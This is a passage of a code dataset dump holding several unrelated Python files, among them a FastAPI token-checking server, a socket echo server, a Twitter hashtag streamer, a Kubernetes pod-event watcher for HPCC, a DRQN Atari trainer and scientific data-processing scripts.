herein to any specific commercial products, process, or services\n# by trade name, trademark, manufacturer or otherwise does not necessarily constitute\n# or imply its endorsement, recommendation, or favoring by the United States Government\n# or Lawrence Livermore National Security, LLC. 
The views and opinions of authors expressed\n# herein do not necessarily state or reflect those of the United States Government or\n# Lawrence Livermore National Security, LLC, and shall not be used for advertising or\n# product endorsement purposes.\n# \n# <>\nimport os\nfrom fudge.legacy.endl import endlProject\nimport site_packages.legacy.toENDF6.toENDF6 # adds 'toENDF6' methods to GND classes\n\nimport argparse\nparser = argparse.ArgumentParser( description = \"Translate ENDL evaluations into GND, and optionally also ENDF-6.\" )\nparser.add_argument( 'ZA', type = str, help = \"za of target to translate\" )\nparser.add_argument( '-l', '--library', default = 'endl2011.0',\n help = \"ENDL library (default=endl2011.0). May be full path or identifier\" )\nparser.add_argument( '-p', '--projectile', default = 'n',\n help = \"Choose projectile (default='n'). May be string or yi number\" )\nparser.add_argument( '-6', '--toENDF6', action = 'store_true',\n help = \"After creating GND, also translate to ENDF-6\" )\nparser.add_argument( '-v', '--version', default = '1.0.0',\n help = \"Evaluation version number. Should be of form 'major.minor.patchlevel' (i.e. 2011.0.1)\" )\n\nif( __name__ == '__main__' ) :\n\n args = parser.parse_args( )\n\n e = endlProject( args.library, projectile = args.projectile, readOnly = True )\n\n za = e.readZA( args.ZA )\n za.read ()\n r = za.toGND( evaluationLibrary = os.path.basename( args.library ), evaluationVersion = args.version )\n r.saveToFile( \"endl2gnd.xml\" )\n\n if( args.toENDF6 ) :\n with open( \"endl2gnd.endf\", \"w\" ) as fout :\n fout.write( r.toENDF6( style = \"eval\", flags = { 'verbosity' : 32 } ) )\n","sub_path":"site_packages/LLNL/ENDL2gnd.py","file_name":"ENDL2gnd.py","file_ext":"py","file_size_in_byte":5082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"220286137","text":"from os import getenv\nfrom typing import Optional\n\nimport requests\nimport uvicorn\nfrom fastapi import Depends, FastAPI, Request\nfrom fastapi.exceptions import HTTPException\nfrom fastapi.responses import RedirectResponse\nfrom pydantic import BaseModel\n\nAUTH_URI = getenv(key=\"AUTH_URI\", default=\"localhost\")\nAUTH_PORT = getenv(key=\"AUTH_PORT\", default=\"5000\")\n\n\nclass User(BaseModel):\n username: str\n email: Optional[str] = None\n full_name: Optional[str] = None\n\n\nresource_api = FastAPI()\n\n\nasync def get_current_user(token: str):\n response = requests.get(url=AUTH_URI + ':' + AUTH_PORT + '/user_info', headers={\"Authorization\": \"Bearer \" + token})\n if response.status_code != 200:\n raise HTTPException(status_code=response.status_code, detail=response.content.decode())\n return response.content.decode()\n\n\nasync def check_auth(request: Request):\n authorization: str = request.headers.get(\"Authorization\")\n if not authorization:\n raise HTTPException(status_code=401, detail=\"Not authenticated\")\n token_type, _, token = authorization.partition(\" \")\n if token_type.lower() != \"bearer\":\n raise HTTPException(status_code=401, detail=\"Invalid Authorization header\")\n return token\n\n\nasync def check_access(roles, token=Depends(check_auth)):\n request_body = {\n \"token_type\": \"Bearer\",\n \"token\": token,\n \"roles_acceptable\": roles\n }\n response = requests.post(\n url='http://auth:5000/check_access',\n data=request_body\n )\n if response.status_code == 200:\n return True\n elif response.status_code == 403:\n return False\n else:\n return 
response\n\n\n@resource_api.get(\"/user_page\")\nasync def read_users_me(token=Depends(check_auth)):\n    current_user = await get_current_user(token)\n    return current_user\n\n\n@resource_api.get(\"/\")\nasync def redirect_home():\n    return RedirectResponse(url=\"/homepage\")\n\n\n@resource_api.get(\"/homepage\")\nasync def homepage():\n    return \"Welcome to Auth Testing app\"\n\n\n@resource_api.get(\"/restricted_resource\")\nasync def restricted(token=Depends(check_auth)):\n    # check_access is a coroutine, so it must be awaited; the token arrives via\n    # dependency injection rather than by calling Depends() inside the handler\n    access = await check_access(roles=[], token=token)\n    if not isinstance(access, bool):\n        return access\n    if access:\n        return \"Some private info\"\n    raise HTTPException(status_code=403, detail=\"Forbidden\")\n\n\nif __name__ == '__main__':\n    uvicorn.run(\n        'main:resource_api',\n        host='0.0.0.0',\n        port=8000,\n    )\n","sub_path":"resource/src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"147910101","text":"from threading import Thread\nimport socket\n\n\ndef handle_tcp(s):\n    s.listen(1)\n    while True:\n        client_socket, address = s.accept()\n        print(\"Connection incoming from {}\".format(address))\n        Thread(target=handle_tcp_client, args=(client_socket, )).start()\n\n\ndef handle_tcp_client(conn):\n    while True:\n        data = conn.recv(1024)\n        if not data: # an empty read means the client closed the connection\n            break\n        data = \"ECHO: \" + data.decode(\"utf-8\")\n        conn.sendall(data.encode(\"utf-8\"))\n    conn.close()\n\n\ndef handle_udp(s):\n    while True:\n        msg, address = s.recvfrom(1024)\n        msg = \"ECHO: \" + msg.decode(\"utf-8\")\n        s.sendto(bytes(msg, \"utf-8\"), address)\n\n\nwith open(\"conf.conf\") as file:\n    lines = file.readlines()\n    conf = dict()\n    for line in lines:\n        param = line.split(':')\n        conf[param[0]] = param[1][:-1]\n\nIP = conf[\"ip\"]\nPORT_SERVER = int(conf[\"port-s\"])\nchoice = conf[\"type\"]\n\nif choice == \"T\":\n    print(\"TCP mode\")\n    sock_type = socket.SOCK_STREAM\n    handler = handle_tcp\nelse:\n    print(\"UDP mode\")\n    sock_type = socket.SOCK_DGRAM\n    handler = handle_udp\n\ns = socket.socket(socket.AF_INET, sock_type)\n\ntry:\n    s.bind((IP, PORT_SERVER))\nexcept OSError:\n    print(\"Bind error!\")\n\nhandler(s)\ns.close()","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"85904963","text":"#! /usr/bin/env python\nimport math\nimport rospy\n\nfrom geometry_msgs.msg import Pose\nfrom cob_cartesian_controller.msg import Profile\nimport simple_cartesian_interface as sci\n\nif __name__ == '__main__':\n    rospy.init_node('test_move_circ_interface')\n\n    pose = sci.gen_pose(pos=[0.0, 0.7, 1.0], rpy=[0.0, 0.0, 0.0])\n    start_angle = 0.0 * math.pi / 180.0\n    end_angle = 90.0 * math.pi / 180.0\n    profile = Profile()\n    profile.vel = 0.2\n    profile.accl = 0.1\n    #profile.profile_type = Profile.SINOID\n    profile.profile_type = Profile.RAMP\n\n    success, message = sci.move_circ(pose, \"world\", start_angle, end_angle, 0.3, profile)\n    if success:\n        rospy.loginfo(message)\n    else:\n        rospy.logerr(message)\n","sub_path":"cob_cartesian_controller/scripts/test_move_circ_interface.py","file_name":"test_move_circ_interface.py","file_ext":"py","file_size_in_byte":726,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"30212212","text":"#!/bin/python3\n\n# Author: David SB Lee\n# First Compiled: 02/08/18\n# Purpose: Extract T1w voxel intensities by coordinate\n\n# Things to change when running on a different data set\n\t# 1. all paths\n\t# 2. 
all splits\n\nimport nibabel as nib\nimport glob\n\n# Set global variables (paths)\npath = \"/path/to/T1w.nii.gz\"\n\nif __name__ == \"__main__\":\n\t# Put the images in a list\n\tfiles = sorted(glob.glob(path))\n\n\t# Create a list of subject numbers (the split index depends on how deep the subject folder sits in the path)\n\tsubNumList = [file.split('/')[4] for file in files]\n\t# If you don't want to use list comprehension\n\tsubNumList = []\n\tfor file in files:\n\t\tsubNum = file.split('/')[4]\n\t\tsubNumList.append(subNum)\n\t# If you want to add a label to the list\n\tsubNumList.insert(0, 'SubjectID')\n\t\n\t# Put voxel coordinates and intensities in separate lists for each file\n\tfor file in files:\n\n\t\t# Load T1w as nibabel image\n\t\timg = nib.load(file)\n\t\tdata = img.get_data() # newer nibabel versions use img.get_fdata()\n\n\t\t# Check data dimensions\n\t\timg.shape\n\t\tdata.shape\n\n\t\tintensity_list = []\n\t\tcoordinate_list = []\n\n\t\t# Start extraction\n\t\tfor i in range(img.shape[0]):\n\t\t\tfor j in range(img.shape[1]):\n\t\t\t\tfor k in range(img.shape[2]):\n\t\t\t\t\tx = str(i + 1)\n\t\t\t\t\ty = str(j + 1)\n\t\t\t\t\tz = str(k + 1)\n\t\t\t\t\teach_coordinate = (x,y,z)\n\t\t\t\t\teach_coordinate = \" \".join(each_coordinate)\n\t\t\t\t\tcoordinate_list.append(each_coordinate)\n\t\t\t\t\tintensity_list.append(data[i][j][k])\n\t\t\t\t\tprint (each_coordinate, data[i][j][k])\n","sub_path":"tools/nibabel/extract_T1w_voxels_nibabel.py","file_name":"extract_T1w_voxels_nibabel.py","file_ext":"py","file_size_in_byte":1347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"461993970","text":"import numpy as np\r\nimport numpy.ma as ma\r\n\r\ndata = np.zeros((365,25))\r\n\r\n\r\n# Pollutant observations: NO2,SO2,O3,PM25,PM10,CO(mg/m3)\r\np_obs = np.load('D:/project/data/pollutant/obs/p_obs_daily.npy')\r\np_obs = p_obs[132:140,113:121,:,:] #(8, 8, 365, 6)\r\np_obs = ma.masked_array(p_obs, p_obs == -999.) \r\np_obs = np.mean(p_obs,axis=(0,1)) #(365, 6)\r\np_obs[0,0]= 49\r\np_obs[0,1]= 23\r\np_obs[0,2]= 29\r\np_obs[0,3]= 41\r\np_obs[0,4]= 66\r\np_obs[0,5]= 1.09\r\n\r\n\r\n# Pollutant simulations: PM25,PM10,SO2,NO2,O3,CO(mg/m3)\r\np_sim = np.load('D:/project/data/pollutant/cmaq/p_sim_daily.npy')\r\np_sim = p_sim[132:140,113:121,:,:] #(8, 8, 365, 6)\r\np_sim = ma.masked_array(p_sim, p_sim == -999.) \r\np_sim = np.mean(p_sim,axis=(0,1)) #(365, 6)\r\n\r\n \r\n# Meteorological observations: PRE,RH,WSPD,WDIR,TEM\r\nmete_obs = np.load('D:/project/data/mete/obs/cma/m_obs_daily.npy')\r\nmete_obs = mete_obs[132:140,113:121,:,:] #(8, 8, 365, 5)\r\nmete_obs = ma.masked_array(mete_obs, mete_obs == -999.) \r\nmete_obs = np.mean(mete_obs,axis=(0,1)) #(365, 5)\r\nmete_obs[324,2] = 1.31 # Note: the value for 11/21 is bad, so it is replaced with 1.31\r\n\r\n# Meteorological simulations: RH,TEM,PBLH,SOL_RAD,PRE,WSPD,WDIR\r\nmete_sim = np.load('D:/project/data/mete/cmaq/m_sim_daily.npy')\r\nmete_sim = mete_sim[132:140,113:121,:,:] #(8, 8, 365, 7)\r\nmete_sim = ma.masked_array(mete_sim, mete_sim == -999.) 
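# Quick sanity check for the masking pattern used above (an illustrative sketch only, not part of the dataset build):\r\n#   demo = ma.masked_array(np.array([1., -999., 3.]), np.array([1., -999., 3.]) == -999.)\r\n#   float(np.mean(demo)) == 2.0, because the masked -999. fill value is excluded from the average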
\r\nmete_sim = np.mean(mete_sim,axis=(0,1)) #(365, 7)\r\n\r\n\r\ndata[:,0] = (p_sim[:,0] - p_obs[:,3]) #PM2.5_Bias\r\ndata[:,1] = (p_sim[:,1] - p_obs[:,4]) #PM10_Bias\r\ndata[:,2] = (p_sim[:,3] - p_obs[:,0]) #NO2_Bias\r\ndata[:,3] = (p_sim[:,2] - p_obs[:,1]) #SO2_Bias\r\ndata[:,4] = (p_sim[:,4] - p_obs[:,2]) #O3_Bias\r\ndata[:,5] = (p_sim[:,5] - p_obs[:,5]) #CO_Bias\r\ndata[:,6] = p_obs[:,3] #PM2.5_Obs\r\ndata[:,7] = p_obs[:,4] #PM10_Obs\r\ndata[:,8] = p_obs[:,0] #NO2_Obs\r\ndata[:,9] = p_obs[:,1] #SO2_Obs\r\ndata[:,10] = p_obs[:,2] #O3_Obs\r\ndata[:,11] = p_obs[:,5] #CO_Obs\r\ndata[:,12] = p_sim[:,0] #PM2.5_Sim\r\ndata[:,13] = (mete_sim[:,0] - mete_obs[:,1]) #RH_Bias\r\ndata[:,14] = (mete_sim[:,1] - mete_obs[:,4]) #TEM_Bias\r\ndata[:,15] = (mete_sim[:,5] - mete_obs[:,2]) #WSPD_Bias\r\n\r\nfor i in range(365): #WDIR_Bias\r\n    WDIR_Bias = np.abs(mete_sim[i,6] - mete_obs[i,3])\r\n    if WDIR_Bias > 180.: \r\n        data[i,16] = 360. - WDIR_Bias \r\n    else:\r\n        data[i,16] = WDIR_Bias\r\n\r\ndata[:,17] = (mete_sim[:,4] - mete_obs[:,0]) #PRE_Bias\r\ndata[:,18] = mete_obs[:,1] #RH_Obs\r\ndata[:,19] = mete_obs[:,4] #TEM_Obs\r\ndata[:,20] = mete_obs[:,2] #WSPD_Obs\r\ndata[:,21] = mete_obs[:,3] #WDIR_Obs\r\ndata[:,22] = mete_obs[:,0] #PRE_Obs\r\ndata[:,23] = mete_sim[:,2] #PBLH_Sim\r\ndata[:,24] = mete_sim[:,3] #SOLRAD_Sim\r\ndata = np.around(data, 2) # keep 2 decimal places throughout\r\n#np.savetxt(\"D:/project/data/beijing/dataset.csv\", data, delimiter=',')\r\nnp.save(\"D:/project/data/beijing/dataset_abs.npy\", data)","sub_path":"beijing/dataset_abs.py","file_name":"dataset_abs.py","file_ext":"py","file_size_in_byte":2740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"360836489","text":"import json\nimport logging\nimport socket\n\nimport requests\nimport requests_oauthlib\n\nconsumer_key = ''\nconsumer_secret = ''\naccess_token = ''\naccess_secret = ''\n\nauth = requests_oauthlib.OAuth1(consumer_key,\n                                consumer_secret,\n                                access_token,\n                                access_secret,\n                                signature_type='auth_header')\n\n\ndef get_tweets_filter(track='', locations: tuple = ()):\n    # streaming requests doc:\n    # http://docs.python-requests.org/en/master/user/advanced/#streaming-requests\n\n    url = 'https://stream.twitter.com/1.1/statuses/filter.json?'\n    data = f'track={track}'\n    query_url = url + data\n\n    response = requests.get(query_url, auth=auth, stream=True)\n\n    return response\n\n\ndef send_hashtags_data_server(response, connection):\n\n    for line in response.iter_lines():\n        if line:\n            decoded_line = line.decode('utf-8')\n            tweet_json = json.loads(decoded_line)\n            # tweet_text = tweet_json['text']\n\n            tweet_hashtags = tweet_json['entities']['hashtags']\n            if tweet_hashtags:\n                for hashtag in tweet_hashtags:\n\n                    hashtag_text = hashtag['text']\n                    connection.send(hashtag_text.encode('utf-8') + b'\\n')\n                    logging.info(f'Sent hashtag:\\n{hashtag_text}\\n=======')\n\n\ndef create_data_server_connection():\n\n    host = 'localhost'\n    port = 4040\n\n    # make a TCP socket object\n    socket_obj = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n    # bind it to server port number\n    socket_obj.bind((host, port))\n    socket_obj.listen()\n\n    logging.info(\"Waiting for TCP connection...\")\n\n    return socket_obj.accept()\n\n\n\nif __name__ == '__main__':\n\n    # set up logging\n    logging.getLogger().setLevel(\n        level=logging.INFO\n    )\n\n    # create data server connection\n    connection, address = create_data_server_connection()\n\n    logging.info(\"Connected. 
Receiving tweets.\")\n tweet_stream = get_tweets_filter(track='FelizJueves')\n send_hashtags_data_server(tweet_stream, connection)\n","sub_path":"hashtags.py","file_name":"hashtags.py","file_ext":"py","file_size_in_byte":2122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"152544035","text":"#!/usr/bin/python3\n################################################################################\n# HPCC SYSTEMS software Copyright (C) 2019 HPCC Systems®.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n################################################################################\n\nimport os.path\nimport signal\nimport sys\nimport time\nimport datetime\nfrom kubernetes import client, config, watch\n\ndef signal_handler(signum, frame):\n sys.exit(0)\n\ndef current_time():\n ts = time.time()\n return datetime.datetime.fromtimestamp(ts).strftime('%Y%m%d_%H:%M:%S')\n\ndef main():\n # Configs can be set in Configuration class directly or using helper\n # utility. If no argument provided, the config will be loaded from\n # default location.\n #config.load_kube_config()\n config.load_incluster_config()\n\n v1 = client.CoreV1Api()\n current_namespace = open(\"/var/run/secrets/kubernetes.io/serviceaccount/namespace\").read()\n\n event_log = \"/tmp/pod_events.log\"\n if os.path.exists(event_log):\n os.remove(event_log)\n\n event_err = \"/tmp/pod_events_error.log\"\n if os.path.exists(event_err):\n os.remove(event_err)\n\n config_log = \"/tmp/hpcc_config.log\"\n if os.path.exists(config_log):\n os.remove(config_log)\n\n not_ready_list = []\n resource_version=0;\n while True:\n\n #print(\"Wait for events ...\")\n #f_event = open (event_log, 'a')\n #f_event.write(\"%s - Wait for events ... 
\\n\" % (current_time()))\n #f_event.write(\"Number of not ready pods: %d\\n\" % (len(not_ready_list)))\n #f_event.close()\n w = watch.Watch()\n try:\n new_running_list = []\n f_event = open (event_log, 'a')\n for event in w.stream(v1.list_namespaced_pod, namespace=current_namespace, timeout_seconds=5, resource_version=resource_version):\n #print(\"Event: %s %s %s %s\" % (event['type'],event['object'].kind, event['object'].metadata.name, event['object'].status.phase))\n f_event.write(\"%s - Event: %s %s %s %s\\n\" % (current_time(),event['type'],event['object'].kind, event['object'].metadata.name, event['object'].status.phase))\n #print(\"Resource_version: %s\" % (event['object'].metadata.resource_version))\n if int(resource_version) < int(event['object'].metadata.resource_version):\n resource_version = event['object'].metadata.resource_version\n pod_name = event['object'].metadata.name\n state = event['object'].status.phase\n if (pod_name.startswith('dali') or\n pod_name.startswith('esp') or\n pod_name.startswith('thor') or\n pod_name.startswith('thor_roxie') or\n pod_name.startswith('roxie') or\n pod_name.startswith('eclcc') or\n pod_name.startswith('scheduler') or\n pod_name.startswith('backup') or\n pod_name.startswith('sasha') or\n pod_name.startswith('dropzone') or\n pod_name.startswith('support') or\n pod_name.startswith('spark') or\n pod_name.startswith('ldap') or\n pod_name.startswith('node')):\n\n if state == 'Running':\n if pod_name not in new_running_list:\n new_running_list.append(pod_name)\n if pod_name in not_ready_list:\n not_ready_list.remove(pod_name)\n else:\n if pod_name not in not_ready_list:\n not_ready_list.append(pod_name)\n\n f_event.close()\n #print(\"not_ready_list size: %d, new_running_list size: %d\" % (len(not_ready_list), len(new_running_list)))\n if len(not_ready_list) == 0 and len(new_running_list) > 0:\n # Configure and restart HPCC cluster\n #print(\"/opt/hpcc-tools/config_hpcc.sh\")\n cmd = \"/opt/hpcc-tools/config_hpcc.sh > \" + config_log + \" 2>&1\"\n os.system(cmd)\n\n except Exception as e:\n #print(e)\n f_error = open (event_err, 'a')\n f_error.write(str(e))\n f_error.close()\n\n\nif __name__ == '__main__':\n signal.signal(signal.SIGINT, signal_handler)\n signal.signal(signal.SIGTERM, signal_handler)\n main()\n","sub_path":"legacy/deployment/admin/hpcc-tools/kube/events_watcher.py","file_name":"events_watcher.py","file_ext":"py","file_size_in_byte":4879,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"270364230","text":"\"\"\"An example of training a Deep Recurrent Q-Network (DRQN).\n\nDRQN is a DQN with a recurrent Q-network, described in\nhttps://arxiv.org/abs/1507.06527.\n\nTo train DRQN for 50M timesteps on Breakout, run:\n python train_drqn_ale.py --recurrent\n\nTo train DQRN using a recurrent model on flickering 1-frame Breakout, run:\n python train_drqn_ale.py --recurrent --flicker --no-frame-stack\n\"\"\"\nfrom __future__ import print_function\nfrom __future__ import division\nfrom __future__ import unicode_literals\nfrom __future__ import absolute_import\nfrom builtins import * # NOQA\nfrom future import standard_library\nstandard_library.install_aliases() # NOQA\nimport argparse\nimport functools\nimport os\nimport sys\n\nimport chainer\nfrom chainer import functions as F\nfrom chainer import links as L\nimport gym\nimport gym.wrappers\nimport numpy as np\n\nimport chainerrl\nfrom chainerrl.action_value import DiscreteActionValue\nfrom chokozainerrl import experiments\nfrom 
chokozainerrl import tools\nfrom chainerrl import explorers\nfrom chainerrl import misc\nfrom chainerrl import replay_buffer\n\nfrom chainerrl.wrappers import atari_wrappers\n\n\ndef make_args(argstr):\n parser = argparse.ArgumentParser()\n parser.add_argument('--mode', type=str, default='check')\n parser.add_argument('--env', type=str, default='BreakoutNoFrameskip-v4')\n parser.add_argument('--outdir', type=str, default='results')\n parser.add_argument('--gpu', type=int, default=0)\n parser.add_argument('--load-agent', type=str, default=None)\n parser.add_argument('--log-type',type=str,default=\"full_stream\")\n parser.add_argument('--save-mp4',type=str,default=\"test.mp4\")\n\n parser.add_argument('--steps', type=int, default=5 * 10 ** 7)\n parser.add_argument('--step-offset', type=int, default=0)\n parser.add_argument('--checkpoint-frequency', type=int,default=None)\n parser.add_argument('--max-frames', type=int,default=30 * 60 * 60) # 30 minutes with 60 fps\n parser.add_argument('--eval-interval', type=int, default=250000)\n parser.add_argument('--eval-n-steps', type=int, default=125000)\n\n parser.add_argument('--seed', type=int, default=0)\n parser.add_argument('--final-exploration-frames',type=int, default=10 ** 6)\n parser.add_argument('--final-epsilon', type=float, default=0.01)\n parser.add_argument('--eval-epsilon', type=float, default=0.001)\n parser.add_argument('--replay-start-size', type=int, default=5 * 10 ** 4)\n parser.add_argument('--target-update-interval',type=int, default=10 ** 4)\n parser.add_argument('--update-interval', type=int, default=4)\n parser.add_argument('--batch-size', type=int, default=32)\n parser.add_argument('--lr', type=float, default=2.5e-4)\n parser.add_argument('--render', action='store_true', default=False)\n parser.add_argument('--monitor', action='store_true', default=False)\n\n parser.add_argument('--recurrent', action='store_true', default=False)\n parser.add_argument('--flicker', action='store_true', default=False)\n parser.add_argument('--no-frame-stack', action='store_true', default=False)\n parser.add_argument('--episodic-update-len', type=int, default=10)\n\n myargs = parser.parse_args(argstr)\n return myargs\n\ndef main(args):\n import logging\n logging.basicConfig(level=logging.INFO, filename='log')\n\n if(type(args) is list):\n args=make_args(args)\n if not os.path.exists(args.outdir):\n os.makedirs(args.outdir)\n\n # Set a random seed used in ChainerRL.\n misc.set_random_seed(args.seed, gpus=(args.gpu,))\n\n # Set different random seeds for train and test envs.\n train_seed = args.seed\n test_seed = 2 ** 31 - 1 - args.seed\n\n def make_env(test):\n # Use different random seeds for train and test envs\n env_seed = test_seed if test else train_seed\n env = atari_wrappers.wrap_deepmind(\n atari_wrappers.make_atari(args.env, max_frames=args.max_frames),\n episode_life=not test,\n clip_rewards=not test,\n flicker=args.flicker,\n frame_stack=not args.no_frame_stack,\n )\n env.seed(int(env_seed))\n if test:\n # Randomize actions like epsilon-greedy in evaluation as well\n env = chainerrl.wrappers.RandomizeAction(env, args.eval_epsilon)\n if args.monitor:\n env = gym.wrappers.Monitor(\n env, args.outdir,\n mode='evaluation' if test else 'training')\n if args.render:\n env = chainerrl.wrappers.Render(env)\n return env\n\n env = make_env(test=False)\n eval_env = make_env(test=True)\n print('Observation space', env.observation_space)\n print('Action space', env.action_space)\n\n n_actions = env.action_space.n\n if args.recurrent:\n # Q-network 
with LSTM\n q_func = chainerrl.links.StatelessRecurrentSequential(\n L.Convolution2D(None, 32, 8, stride=4),\n F.relu,\n L.Convolution2D(None, 64, 4, stride=2),\n F.relu,\n L.Convolution2D(None, 64, 3, stride=1),\n functools.partial(F.reshape, shape=(-1, 3136)),\n F.relu,\n L.NStepLSTM(1, 3136, 512, 0),\n L.Linear(None, n_actions),\n DiscreteActionValue,\n )\n # Replay buffer that stores whole episodes\n rbuf = replay_buffer.EpisodicReplayBuffer(10 ** 6)\n else:\n # Q-network without LSTM\n q_func = chainer.Sequential(\n L.Convolution2D(None, 32, 8, stride=4),\n F.relu,\n L.Convolution2D(None, 64, 4, stride=2),\n F.relu,\n L.Convolution2D(None, 64, 3, stride=1),\n functools.partial(F.reshape, shape=(-1, 3136)),\n L.Linear(None, 512),\n F.relu,\n L.Linear(None, n_actions),\n DiscreteActionValue,\n )\n # Replay buffer that stores transitions separately\n rbuf = replay_buffer.ReplayBuffer(10 ** 6)\n\n # Draw the computational graph and save it in the output directory.\n fake_obss = np.zeros(env.observation_space.shape, dtype=np.float32)[None]\n if args.recurrent:\n fake_out, _ = q_func(fake_obss, None)\n else:\n fake_out = q_func(fake_obss)\n chainerrl.misc.draw_computational_graph(\n [fake_out], os.path.join(args.outdir, 'model'))\n\n explorer = explorers.LinearDecayEpsilonGreedy(\n 1.0, args.final_epsilon,\n args.final_exploration_frames,\n lambda: np.random.randint(n_actions))\n\n opt = chainer.optimizers.Adam(1e-4, eps=1e-4)\n opt.setup(q_func)\n\n def phi(x):\n # Feature extractor\n return np.asarray(x, dtype=np.float32) / 255\n\n agent = chainerrl.agents.DoubleDQN(\n q_func,\n opt,\n rbuf,\n gpu=args.gpu,\n gamma=0.99,\n explorer=explorer,\n replay_start_size=args.replay_start_size,\n target_update_interval=args.target_update_interval,\n update_interval=args.update_interval,\n batch_accumulator='mean',\n phi=phi,\n minibatch_size=args.batch_size,\n episodic_update_len=args.episodic_update_len,\n recurrent=args.recurrent,\n )\n\n if args.load_agent:\n agent.load(args.load_agent)\n\n if (args.mode=='train'):\n experiments.train_agent_with_evaluation(\n agent=agent, env=env, steps=args.steps,\n checkpoint_freq=args.checkpoint_frequency,\n step_offset=args.step_offset,\n eval_n_steps=args.eval_n_steps,\n eval_n_episodes=None,\n eval_interval=args.eval_interval,\n outdir=args.outdir,\n eval_env=eval_env,\n log_type=args.log_type\n )\n elif (args.mode=='check'):\n return tools.make_video.check(env=env,agent=agent,save_mp4=args.save_mp4)\n\n elif (args.mode=='growth'):\n return tools.make_video.growth(env=env,agent=agent,outdir=args.outdir,max_num=args.max_frames,save_mp4=args.save_mp4)\n","sub_path":"chokozainerrl/train_drqn_ale.py","file_name":"train_drqn_ale.py","file_ext":"py","file_size_in_byte":7926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"623831936","text":"\n#from sand import top_level_import\n#assert top_level_import(__name__, 'sand.forgot_import', args=('logic error',))\n\n\n#from sand import frozendict\nfrom seed.types.FrozenDict import FrozenDict as frozendict\nfrom .min_factor import min_factor as n2min_factor\nfrom .numberss import NumberList\nfrom ..smalls import divides\nfrom ..integer.CertificatedPrime import \\\n CertificatedPrime, find_primitive_root\n\n\n'''\nn2factors = [None, frozendict()]\n\ndef get_n2factors_least_len(L):\n n2min_factor = min_factor.get_least_len(L)\n for n in range(len(n2factors), L):\n assert len(n2factors) == n\n \n p = n2min_factor[n]\n assert divides(p, n)\n if p < n:\n p, = 
n2factors[p].keys() # int to CertificatedPrime\n            p2exp = dict(n2factors[n//p])\n            p2exp.setdefault(p, 0)\n            p2exp[p] += 1\n            n2factors.append(frozendict(p2exp))\n        else:\n            assert p == n\n            root = find_primitive_root(p, p-1, n2factors[p-1])\n            p_ = CertificatedPrime(n2factors[p-1], root)\n            assert p_ == p\n            p = p_\n            n2factors.append(frozendict({p:1}))\n    return n2factors\n\n\n\n\n\nfrom pprint import pprint\npprint(get_n2factors_least_len(10))\n'''\n\n\nclass CertificatedFactors(NumberList):\n    def _calc_pos(self, n, nums):\n        n2factors = nums\n        assert len(n2factors) == n\n        \n        p = n2min_factor(n) # __call__ not __index__\n        assert divides(p, n)\n        if p < n:\n            p, = n2factors[p].keys() # int to CertificatedPrime\n            p2exp = dict(n2factors[n//p])\n            p2exp.setdefault(p, 0)\n            p2exp[p] += 1\n            result = frozendict(p2exp)\n            #n2factors.append(frozendict(p2exp))\n        else:\n            assert p == n\n            root = find_primitive_root(p, p-1, n2factors[p-1])\n            p_ = CertificatedPrime(n2factors[p-1], root)\n            assert p_ == p\n            p = p_\n            result = frozendict({p:1})\n            #n2factors.append(frozendict({p:1}))\n        return result\n    def __init__(self):\n        super().__init__([None, frozendict()])\n\n\n\nn2factors = certificated_factors = CertificatedFactors()\n\n_data = [None, {}, {2:1}, {3:1}, {2:2}, {5:1}, {2:1,3:1},\n    {7:1}, {2:3}, {3:2}, {2:1,5:1}, {11:1}, {2:2,3:1}]\n\nassert n2factors.get_first(len(_data)) == _data\n\n\n\n\n\n\n \n \n","sub_path":"nn_ns/math_nn/numbers/certificated_factors.py","file_name":"certificated_factors.py","file_ext":"py","file_size_in_byte":2409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"488978729","text":"listaNum = list()\nlistaPares = list()\nlistaImpares = list()\n\nwhile True:\n    num = int(input('Enter a number: '))\n    listaNum.append(num)\n    if num % 2 == 0:\n        listaPares.append(num)\n    else:\n        listaImpares.append(num)\n    resp = str(input('Do you want to continue [Y/N]? ')).lower()\n    if resp == 'n':\n        break\nlistaPares.sort()\nlistaImpares.sort()\nlistaNum.sort()\nprint(f'List of all numbers entered: {listaNum}')\nprint(f'List with only the odd values entered: {listaImpares}')\nprint(f'List with only the even values entered: {listaPares}')","sub_path":"Exercicios/Estruturas Compostas/Ex082.py","file_name":"Ex082.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"131422170","text":"#\n# Licensed to the Apache Software Foundation (ASF) under one or more\n# contributor license agreements. See the NOTICE file distributed with\n# this work for additional information regarding copyright ownership.\n# The ASF licenses this file to You under the Apache License, Version 2.0\n# (the \"License\"); you may not use this file except in compliance with\n# the License. 
